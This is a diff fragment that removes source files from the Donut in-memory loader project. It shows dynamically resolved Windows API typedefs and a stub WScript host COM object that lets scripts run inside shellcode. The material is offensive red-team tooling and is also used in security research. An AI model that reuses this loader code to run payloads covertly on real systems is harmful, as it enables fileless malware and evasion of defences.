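-IUnknown *punkOuter,
-void *pvThis,
-ITypeInfo *ptinfo,
-IUnknown **ppunkStdDisp);
-
-typedef HRESULT (WINAPI *CreateErrorInfo_t)(
-ICreateErrorInfo **pperrinfo);
-
-typedef HRESULT (WINAPI *CreateDispTypeInfo_t)(
-INTERFACEDATA *pidata,
-LCID lcid,
-ITypeInfo **pptinfo);
-
-typedef HRESULT (WINAPI *GetErrorInfo_t)(
-ULONG dwReserved,
-IErrorInfo **pperrinfo);
-
-typedef HRESULT (WINAPI *LoadTypeLib_t)(
-LPCOLESTR szFile,
-ITypeLib **pptlib);
-
-typedef HRESULT (WINAPI *LoadTypeLibEx_t)(
-LPCOLESTR szFile,
-REGKIND regkind,
-ITypeLib **pptlib);
-
-typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID);
-
-// imports from oleaut32.dll
-typedef HRESULT (WINAPI *SafeArrayGetLBound_t)(
-SAFEARRAY *psa,
-UINT nDim,
-LONG *plLbound);
-
-typedef HRESULT (WINAPI *SafeArrayGetUBound_t)(
-SAFEARRAY *psa,
-UINT nDim,
-LONG *plUbound);
-
-typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)(
-VARTYPE vt,
-UINT cDims,
-SAFEARRAYBOUND *rgsabound);
-
-typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)(
-VARTYPE vt,
-LONG lLbound,
-ULONG cElements);
-
-typedef HRESULT (WINAPI *SafeArrayPutElement_t)(
-SAFEARRAY *psa,
-LONG *rgIndices,
-void *pv);
-
-typedef HRESULT (WINAPI *SafeArrayDestroy_t)(
-SAFEARRAY *psa);
-
-typedef BSTR (WINAPI *SysAllocString_t)(
-const OLECHAR *psz);
-
-typedef void (WINAPI *SysFreeString_t)(
-BSTR bstrString);
-
-// imports from kernel32.dll
-typedef HMODULE (WINAPI *LoadLibraryA_t)(
-LPCSTR lpLibFileName);
-
-typedef FARPROC (WINAPI *GetProcAddress_t)(
-HMODULE hModule,
-LPCSTR lpProcName);
-
-typedef BOOL (WINAPI *AllocConsole_t)(void);
-
-typedef BOOL (WINAPI *AttachConsole_t)(
-DWORD dwProcessId);
-
-typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)(
-PHANDLER_ROUTINE HandlerRoutine,
-BOOL Add);
-
-typedef HANDLE (WINAPI *GetStdHandle_t)(
-DWORD nStdHandle);
-
-typedef BOOL (WINAPI *SetStdHandle_t)(
-DWORD nStdHandle,
-HANDLE hHandle);
-
-typedef HANDLE (WINAPI *CreateFileA_t)(
-LPCSTR lpFileName,
-DWORD dwDesiredAccess,
-DWORD dwShareMode,
-LPSECURITY_ATTRIBUTES lpSecurityAttributes,
-DWORD dwCreationDisposition,
-DWORD dwFlagsAndAttributes,
-HANDLE hTemplateFile);
-
-typedef HANDLE (WINAPI *CreateEventA_t)(
-LPSECURITY_ATTRIBUTES lpEventAttributes,
-BOOL bManualReset,
-BOOL bInitialState,
-LPCSTR lpName);
-
-typedef BOOL (WINAPI *CloseHandle_t)(HANDLE hObject);
-
-typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent);
-
-typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID);
-
-typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID);
-
-typedef HHOOK (WINAPI *SetWindowsHookExA_t)(
-int idHook,
-HOOKPROC lpfn,
-HINSTANCE hmod,
-DWORD dwThreadId);
-
-typedef BOOL (WINAPI *CreateProcessA_t)(
-LPCSTR lpApplicationName,
-LPSTR lpCommandLine,
-LPSECURITY_ATTRIBUTES lpProcessAttributes,
-LPSECURITY_ATTRIBUTES lpThreadAttributes,
-BOOL bInheritHandles,
-DWORD dwCreationFlags,
-LPVOID lpEnvironment,
-LPCSTR lpCurrentDirectory,
-LPSTARTUPINFOA lpStartupInfo,
-LPPROCESS_INFORMATION lpProcessInformation);
-
-typedef DWORD (WINAPI *WaitForSingleObject_t)(
-HANDLE hHandle,
-DWORD dwMilliseconds);
-
-// imports from wininet.dll
-typedef BOOL (WINAPI *InternetCrackUrl_t)(
-LPCSTR lpszUrl,
-DWORD dwUrlLength,
-DWORD dwFlags,
-LPURL_COMPONENTS lpUrlComponents);
-
-typedef HINTERNET (WINAPI *InternetOpen_t)(
-LPCSTR lpszAgent,
-DWORD dwAccessType,
-LPCSTR lpszProxy,
-LPCSTR lpszProxyBypass,
-DWORD dwFlags);
-
-typedef HINTERNET (WINAPI *InternetConnect_t)(
-HINTERNET hInternet,
-LPCSTR lpszServerName,
-INTERNET_PORT nServerPort,
-LPCSTR lpszUserName,
-LPCSTR lpszPassword,
-DWORD dwService,
-DWORD dwFlags,
-DWORD_PTR dwContext);
-
-typedef HINTERNET (WINAPI *HttpOpenRequest_t)(
-HINTERNET hConnect,
-LPCSTR lpszVerb,
-LPCSTR lpszObjectName,
-LPCSTR lpszVersion,
-LPCSTR lpszReferrer,
-LPCSTR *lplpszAcceptTypes,
-DWORD dwFlags,
-DWORD_PTR dwContext);
-
-typedef BOOL (WINAPI *InternetSetOption_t)(
-HINTERNET hInternet,
-DWORD dwOption,
-LPVOID lpBuffer,
-DWORD dwBufferLength);
-
-typedef BOOL (WINAPI *HttpSendRequest_t)(
-HINTERNET hRequest,
-LPCSTR lpszHeaders,
-DWORD dwHeadersLength,
-LPVOID lpOptional,
-DWORD dwOptionalLength);
-
-typedef BOOL (WINAPI *HttpQueryInfo_t)(
-HINTERNET hRequest,
-DWORD dwInfoLevel,
-LPVOID lpBuffer,
-LPDWORD lpdwBufferLength,
-LPDWORD lpdwIndex);
-
-typedef BOOL (WINAPI *InternetReadFile_t)(
-HINTERNET hFile,
-LPVOID lpBuffer,
-DWORD dwNumberOfBytesToRead,
-LPDWORD lpdwNumberOfBytesRead);
-
-typedef BOOL (WINAPI *InternetCloseHandle_t)(
-HINTERNET hInternet);
-
-typedef BOOL (WINAPI *CryptAcquireContext_t)(
-HCRYPTPROV *phProv,
-LPCSTR szContainer,
-LPCSTR szProvider,
-DWORD dwProvType,
-DWORD dwFlags);
-
-typedef void (WINAPI *GetSystemInfo_t)(
-LPSYSTEM_INFO lpSystemInfo);
-
-typedef SIZE_T (WINAPI *VirtualQuery_t)(
-LPCVOID lpAddress,
-PMEMORY_BASIC_INFORMATION lpBuffer,
-SIZE_T dwLength);
-
-typedef BOOL (WINAPI *VirtualProtect_t)(
-LPVOID lpAddress,
-SIZE_T dwSize,
-DWORD flNewProtect,
-PDWORD lpflOldProtect);
-
-typedef HMODULE (WINAPI *GetModuleHandleA_t)(
-LPCSTR lpModuleName);
-
-typedef HMODULE (WINAPI *LoadLibraryExA_t)(
-LPCSTR lpLibFileName,
-HANDLE hFile,
-DWORD dwFlags);
-
-typedef HMODULE (WINAPI *LoadLibraryExW_t)(
-LPCWSTR lpLibFileName,
-HANDLE hFile,
-DWORD dwFlags);
-
-typedef BOOL (WINAPI *CryptStringToBinaryA_t)(
-LPCSTR pszString,
-DWORD cchString,
-DWORD dwFlags,
-BYTE *pbBinary,
-DWORD *pcbBinary,
-DWORD *pdwSkip,
-DWORD *pdwFlags);
-
-typedef BOOL (WINAPI *CryptDecodeObjectEx_t)(
-DWORD dwCertEncodingType,
-LPCSTR lpszStructType,
-const BYTE *pbEncoded,
-DWORD cbEncoded,
-DWORD dwFlags,
-PCRYPT_DECODE_PARA pDecodePara,
-void *pvStructInfo,
-DWORD *pcbStructInfo);
-
-typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)(
-HCRYPTPROV hCryptProv,
-DWORD dwCertEncodingType,
-PCERT_PUBLIC_KEY_INFO pInfo,
-HCRYPTKEY *phKey);
-
-typedef BOOL (WINAPI *CryptCreateHash_t)(
-HCRYPTPROV hProv,
-ALG_ID Algid,
-HCRYPTKEY hKey,
-DWORD dwFlags,
-HCRYPTHASH *phHash);
-
-typedef BOOL (WINAPI *CryptHashData_t)(
-HCRYPTHASH hHash,
-const BYTE *pbData,
-DWORD dwDataLen,
-DWORD dwFlags);
-
-typedef BOOL (WINAPI *CryptVerifySignature_t)(
-HCRYPTHASH hHash,
-const BYTE *pbSignature,
-DWORD dwSigLen,
-HCRYPTKEY hPubKey,
-LPCSTR szDescription,
-DWORD dwFlags);
-
-typedef BOOL (WINAPI *CryptDestroyHash_t)(
-HCRYPTHASH hHash);
-
-typedef BOOL (WINAPI *CryptDestroyKey_t)(
-HCRYPTKEY hKey);
-
-typedef BOOL (WINAPI *CryptReleaseContext_t)(
-HCRYPTPROV hProv,
-DWORD dwFlags);
-
-typedef LPVOID (WINAPI *VirtualAlloc_t)(
-LPVOID lpAddress,
-SIZE_T dwSize,
-DWORD flAllocationType,
-DWORD flProtect);
-
-typedef BOOL (WINAPI *VirtualFree_t)(
-LPVOID lpAddress,
-SIZE_T dwSize,
-DWORD dwFreeType);
-
-typedef HLOCAL (WINAPI *LocalFree_t)(
-HLOCAL hMem);
-
-typedef HRSRC (WINAPI *FindResource_t)(
-HMODULE hModule,
-LPCSTR lpName,
-LPCSTR lpType);
-
-typedef HGLOBAL (WINAPI *LoadResource_t)(
-HMODULE hModule,
-HRSRC hResInfo);
-
-typedef LPVOID (WINAPI *LockResource_t)(
-HGLOBAL hResData);
-
-typedef DWORD (WINAPI *SizeofResource_t)(
-HMODULE hModule,
-HRSRC hResInfo);
-
-typedef void (WINAPI *RtlZeroMemory_t)(
-LPVOID Destination,
-SIZE_T Length);
-#endif
-
-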
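--- a/payload/wscript.c
+++ b/payload/wscript.c
@@ -1,341 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-// initialize interface with methods/properties
-static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) {
-HRESULT hr;
-
-// IUnknown interface
-host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface);
-host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef);
-host->lpVtbl->Release = ADR(LPVOID, Host_Release);
-
-// IDispatch interface
-host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount);
-host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo);
-host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames);
-host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke);
-
-// IHost interface
-host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name);
-host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application);
-host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName);
-host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path);
-host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive);
-host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive);
-host->lpVtbl->Quit = ADR(LPVOID, Host_Quit);
-host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName);
-host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName);
-host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments);
-host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version);
-host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion);
-host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout);
-host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout);
-host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject);
-host->lpVtbl->Echo = ADR(LPVOID, Host_Echo);
-host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject);
-host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject);
-host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep);
-host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject);
-host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn);
-host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut);
-host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr);
-
-host->m_cRef = 0;
-host->inst = inst;
-
-DPRINT("LoadTypeLib(\"%ws\")", inst->wscript_exe);
-hr = inst->api.LoadTypeLib(inst->wscript_exe, &host->lpTypeLib);
-
-if(hr == S_OK) {
-DPRINT("ITypeLib::GetTypeInfoOfGuid");
-
-hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid(
-host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo);
-}
-DPRINT("HRESULT : %08lx", hr);
-return hr;
-}
-
-// Queries a COM object for a pointer to one of its interface.
-static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) {
-DPRINT("WScript::QueryInterface");
-
-if(ppv == NULL) return E_POINTER;
-
-// we implement the following interfaces
-if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) ||
-IsEqualIID(&iface->inst->xIID_IDispatch, riid) ||
-IsEqualIID(&iface->inst->xIID_IHost, riid))
-{
-*ppv = iface;
-return S_OK;
-}
-*ppv = NULL;
-return E_NOINTERFACE;
-}
-
-// Increments the reference count for an interface pointer to a COM object.
-static ULONG WINAPI Host_AddRef(IHost *iface) {
-DPRINT("WScript::AddRef");
-
-_InterlockedIncrement(&iface->m_cRef);
-return iface->m_cRef;
-}
-
-// Decrements the reference count for an interface on a COM object.
-static ULONG WINAPI Host_Release(IHost *iface) {
-DPRINT("WScript::Release");
-
-ULONG ref = _InterlockedDecrement(&iface->m_cRef);
-return ref;
-}
-
-// Retrieves the number of type information interfaces that an object provides (either 0 or 1).
-static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) {
-DPRINT("WScript::GetTypeInfoCount");
-
-if(pctinfo == NULL) return E_POINTER;
-
-*pctinfo = 1;
-return S_OK;
-}
-
-// Retrieves the type information for an object, which can then be used to get the type information for an interface.
-static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) {
-DPRINT("WScript::GetTypeInfo");
-
-if(ppTInfo == NULL) return E_POINTER;
-
-iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo);
-*ppTInfo = iface->lpTypeInfo;
-
-return S_OK;
-}
-
-// Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
-// which can be used on subsequent calls to Invoke.
-static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid,
-LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) {
-DPRINT("WScript::GetIDsOfNames");
-
-return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId);
-}
-
-// Provides access to properties and methods exposed by an object.
-// The dispatch function DispInvoke provides a standard implementation of Invoke.
-static HRESULT WINAPI Host_Invoke(
-IHost *iface, DISPID dispIdMember, REFIID riid,
-LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
-EXCEPINFO *pExcepInfo, UINT *puArgErr) {
-
-DPRINT("WScript::Invoke");
-
-HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke(
-iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams,
-pVarResult, pExcepInfo, puArgErr);
-
-DPRINT("HRESULT : %08lx", hr);
-
-return hr;
-}
-
-// Returns the name of the WScript object (the host executable file).
-static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) {
-DPRINT("WScript::Name");
-
-return S_OK;
-}
-
-static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) {
-DPRINT("WScript::Application");
-
-return E_NOTIMPL;
-}
-
-// Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
-static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) {
-DPRINT("WScript::FullName");
-
-return E_NOTIMPL;
-}
-
-static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) {
-DPRINT("WScript::Path");
-
-return E_NOTIMPL;
-}
-
-// Gets the script mode, or identifies the script mode.
-static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) {
-DPRINT("WScript::get_Interactive");
-
-return E_NOTIMPL;
-}
-
-// Sets the script mode, or identifies the script mode.
-static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) {
-DPRINT("WScript::put_Interactive");
-
-return E_NOTIMPL;
-}
-
-// Forces script execution to stop at any time.
-static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) {
-DPRINT("WScript::Quit(%i)", ExitCode);
-
-// if you know of a better way to do this..let me know.
-iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0);
-
-return S_OK;
-}
-
-// Returns the file name of the currently running script.
-static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) {
-DPRINT("WScript::ScriptName");
-
-return E_NOTIMPL;
-}
-
-// Returns the full path of the currently running script.
-static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) {
-DPRINT("WScript::ScriptFullName");
-
-return E_NOTIMPL;
-}
-
-// Returns the WshArguments object (a collection of arguments).
-static HRESULT WINAPI Host_get_Arguments(
-IHost *iface, void **out_Arguments) { // IArguments2
-DPRINT("WScript::Arguments");
-
-return E_NOTIMPL;
-}
-
-static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) {
-DPRINT("WScript::Version");
-
-return E_NOTIMPL;
-}
-
-// Returns the Windows Script Host build version number.
-static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) {
-DPRINT("WScript::BuildVersion");
-
-return E_NOTIMPL;
-}
-
-static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) {
-DPRINT("WScript::get_Timeout");
-
-return E_NOTIMPL;
-}
-
-static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) {
-DPRINT("WScript::put_Timeout");
-
-return E_NOTIMPL;
-}
-
-// Connects the object's event sources to functions with a given prefix.
-static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix,
-IDispatch **out_Dispatch) {
-DPRINT("WScript::CreateObject");
-
-return E_NOTIMPL;
-}
-
-// Outputs text to either a message box or the command console window.
-static HRESULT WINAPI Host_Echo(
-IHost *iface, SAFEARRAY *args) {
-DPRINT("WScript::Echo");
-
-return E_NOTIMPL;
-}
-
-// Retrieves an existing object with the specified ProgID, or creates a new one from a file.
-static HRESULT WINAPI Host_GetObject(
-IHost *iface, BSTR Pathname, BSTR ProgID,
-BSTR Prefix, IDispatch **out_Dispatch) {
-DPRINT("WScript::GetObject");
-
-return E_NOTIMPL;
-}
-
-// Disconnects a connected object's event sources.
-static HRESULT WINAPI Host_DisconnectObject(
-IHost *iface, IDispatch *Object) {
-DPRINT("WScript::DisconnectObject");
-
-return E_NOTIMPL;
-}
-
-// Suspends script execution for a specified length of time, then continues execution.
-static HRESULT WINAPI Host_Sleep(
-IHost *iface, LONG Time) {
-
-DPRINT("WScript::Sleep");
-iface->inst->api.Sleep((DWORD)Time);
-
-return S_OK;
-}
-
-// Connects the object's event sources to functions with a given prefix.
-static HRESULT WINAPI Host_ConnectObject(
-IHost *iface, IDispatch *Object, BSTR Prefix) {
-DPRINT("WScript::ConnectObject");
-
-return E_NOTIMPL;
-}
-
-// Exposes the read-only input stream for the current script.
-static HRESULT WINAPI Host_get_StdIn(
-IHost *iface, void **ppts) { // ppts is ITextStream
-DPRINT("WScript::StdIn");
-
-return E_NOTIMPL;
-}
-
-// Exposes the write-only output stream for the current script.
-static HRESULT WINAPI Host_get_StdOut(
-IHost *iface, void **ppts) { // ppts is ITextStream
-DPRINT("WScript::StdOut");
-
-return E_NOTIMPL;
-}
-
-// Exposes the write-only error output stream for the current script.
-static HRESULT WINAPI Host_get_StdErr(
-IHost *iface, void **ppts) { // ppts is ITextStream
-DPRINT("WScript::StdErr");
-
-return E_NOTIMPL;
-}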
+0
-284
payload/wscript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WSCRIPT_H
32 #define WSCRIPT_H
33
34 #include "../include/donut.h"
35
36 typedef struct _IHost IHost;
37
38 typedef struct _IHostVtbl {
39 BEGIN_INTERFACE
40
41 HRESULT (STDMETHODCALLTYPE *QueryInterface)(
42 IHost *This,
43 REFIID riid,
44 void **ppvObject);
45
46 ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This);
47
48 ULONG (STDMETHODCALLTYPE *Release)(IHost *This);
49
50 HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)(
51 IHost *This,
52 UINT *pctinfo);
53
54 HRESULT (STDMETHODCALLTYPE *GetTypeInfo)(
55 IHost *This,
56 UINT iTInfo,
57 LCID lcid,
58 ITypeInfo **ppTInfo);
59
60 HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)(
61 IHost *This,
62 REFIID riid,
63 LPOLESTR *rgszNames,
64 UINT cNames,
65 LCID lcid,
66 DISPID *rgDispId);
67
68 HRESULT (STDMETHODCALLTYPE *Invoke)(
69 IHost *This,
70 DISPID dispIdMember,
71 REFIID riid,
72 LCID lcid,
73 WORD wFlags,
74 DISPPARAMS *pDispParams,
75 VARIANT *pVarResult,
76 EXCEPINFO *pExcepInfo,
77 UINT *puArgErr);
78
79 HRESULT (STDMETHODCALLTYPE *get_Name)(
80 IHost *This,
81 BSTR *out_Name);
82
83 HRESULT (STDMETHODCALLTYPE *get_Application)(
84 IHost *This,
85 IDispatch **out_Dispatch);
86
87 HRESULT (STDMETHODCALLTYPE *get_FullName)(
88 IHost *This,
89 BSTR *out_Path);
90
91 HRESULT (STDMETHODCALLTYPE *get_Path)(
92 IHost *This,
93 BSTR *out_Path);
94
95 HRESULT (STDMETHODCALLTYPE *get_Interactive)(
96 IHost *This,
97 VARIANT_BOOL *out_Interactive);
98
99 HRESULT (STDMETHODCALLTYPE *put_Interactive)(
100 IHost *This,
101 VARIANT_BOOL v);
102
103 HRESULT (STDMETHODCALLTYPE *Quit)(
104 IHost *This,
105 int ExitCode);
106
107 HRESULT (STDMETHODCALLTYPE *get_ScriptName)(
108 IHost *This,
109 BSTR *out_ScriptName);
110
111 HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)(
112 IHost *This,
113 BSTR *out_ScriptFullName);
114
115 HRESULT (STDMETHODCALLTYPE *get_Arguments)(
116 IHost *This,
117 void **out_Arguments);
118
119 HRESULT (STDMETHODCALLTYPE *get_Version)(
120 IHost *This,
121 BSTR *out_Version);
122
123 HRESULT (STDMETHODCALLTYPE *get_BuildVersion)(
124 IHost *This,
125 int *out_Build);
126
127 HRESULT (STDMETHODCALLTYPE *get_Timeout)(
128 IHost *This,
129 LONG *out_Timeout);
130
131 HRESULT (STDMETHODCALLTYPE *put_Timeout)(
132 IHost *This,
133 LONG v);
134
135 HRESULT (STDMETHODCALLTYPE *CreateObject)(
136 IHost *This,
137 BSTR ProgID,
138 BSTR Prefix,
139 IDispatch **out_Dispatch);
140
141 HRESULT (STDMETHODCALLTYPE *Echo)(
142 IHost *This,
143 SAFEARRAY *args);
144
145 HRESULT (STDMETHODCALLTYPE *GetObject)(
146 IHost *This,
147 BSTR Pathname,
148 BSTR ProgID,
149 BSTR Prefix,
150 IDispatch **out_Dispatch);
151
152 HRESULT (STDMETHODCALLTYPE *DisconnectObject)(
153 IHost *This,
154 IDispatch *Object);
155
156 HRESULT (STDMETHODCALLTYPE *Sleep)(
157 IHost *This,
158 LONG Time);
159
160 HRESULT (STDMETHODCALLTYPE *ConnectObject)(
161 IHost *This,
162 IDispatch *Object,
163 BSTR Prefix);
164
165 HRESULT (STDMETHODCALLTYPE *get_StdIn)(
166 IHost *This,
167 void **ppts);
168
169 HRESULT (STDMETHODCALLTYPE *get_StdOut)(
170 IHost *This,
171 void **ppts);
172
173 HRESULT (STDMETHODCALLTYPE *get_StdErr)(
174 IHost *This,
175 void **ppts);
176
177 END_INTERFACE
178 } IHostVtbl;
179
180 typedef struct _IHost {
181 IHostVtbl *lpVtbl; // virtual function table
182 ITypeLib *lpTypeLib; // type library
183 ITypeInfo *lpTypeInfo; // type information for WScript properties/methods
184 IActiveScript *lpEngine; // IActiveScript engine from main thread
185 ULONG m_cRef; // reference count
186 PDONUT_INSTANCE inst;
187 } IHost;
188
189 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host);
190
191 // Queries a COM object for a pointer to one of its interface.
192 static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv);
193
194 // Increments the reference count for an interface pointer to a COM object.
195 static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This);
196
197 // Decrements the reference count for an interface on a COM object.
198 static STDMETHODIMP_(ULONG) Host_Release(IHost *This);
199
200 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
201 static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo);
202
203 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
204 static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo);
205
206 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
207 // which can be used on subsequent calls to Invoke.
208 static STDMETHODIMP Host_GetIDsOfNames(
209 IHost *This, REFIID riid, LPOLESTR *rgszNames,
210 UINT cNames, LCID lcid, DISPID *rgDispId);
211
212 // Provides access to properties and methods exposed by an object.
213 // The dispatch function DispInvoke provides a standard implementation of Invoke.
214 static STDMETHODIMP Host_Invoke(
215 IHost *This, DISPID dispIdMember, REFIID riid,
216 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
217 EXCEPINFO *pExcepInfo, UINT *puArgErr);
218
219 // Returns the name of the WScript object (the host executable file).
220 static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name);
221
222 static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch);
223
224 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
225 static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path);
226
227 static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path);
228
229 // Gets the script mode, or identifies the script mode.
230 static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive);
231
232 // Sets the script mode, or identifies the script mode.
233 static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v);
234
235 // Forces script execution to stop at any time.
236 static STDMETHODIMP Host_Quit(IHost *This, int ExitCode);
237
238 // Returns the file name of the currently running script.
239 static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName);
240
